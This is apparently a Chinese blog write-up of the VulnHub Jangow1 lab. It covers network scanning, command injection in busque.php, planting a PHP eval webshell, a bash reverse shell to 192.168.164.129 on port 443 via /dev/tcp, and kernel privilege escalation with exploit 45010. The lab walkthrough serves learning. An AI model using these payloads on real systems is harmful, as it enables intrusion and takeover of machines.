vulnhub jangow1

which 发布于 2025-04-11 114 次阅读


arp-scan

img

nmap

img

访问80页面,测试一下基本功能点,发现这个地方有rce

img
http://192.168.164.133/site/busque.php?buscar=ls
img

写马

http://192.168.164.133/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%27a%27]);%27%20%3E%203.php
img

进去之后,反弹shellbash -c 'bash -i > /dev/tcp/192.168.164.129/443 0>&1'

此靶场只能用443反弹shell请注意

img

使用python3.7将当前半交互Shell变为全交互

python3 -c 'import pty;pty.spawn("/bin/bash")'
img

提权

Find查找有特殊位权限文件find / -perm -u=s -type f 2>/dev/null

img

查看系统内核以及系统版本

img

根据前面的系统版本和内核查找历史漏洞

img

可以一个个测试,这里测试了45010可以

下载45010

img

使用蚁剑,将这个.c文件上传到靶机的tmp目录下

img

使用靶机编译

img

使用chmod 赋予a.out权限

img

发现了flag

img